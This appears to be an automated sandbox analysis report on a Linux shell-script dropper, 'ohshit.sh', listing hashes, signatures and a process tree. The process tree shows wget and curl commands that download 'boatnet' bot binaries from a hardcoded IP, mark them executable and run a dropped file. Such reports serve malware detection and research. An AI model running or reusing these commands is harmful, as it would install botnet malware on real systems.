Analysis
-
max time kernel
60s -
max time network
64s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/WTF 822 WTF -
resource yara_rule behavioral4/files/fstream-1.dat upx -
Reads runtime system information 2 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:713 -
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:719
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/catcat boatnet.x862⤵PID:820
-
-
/bin/chmodchmod +x boatnet.x86 ohshit.sh WTF2⤵PID:821
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:822
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:824
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
PID:825
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d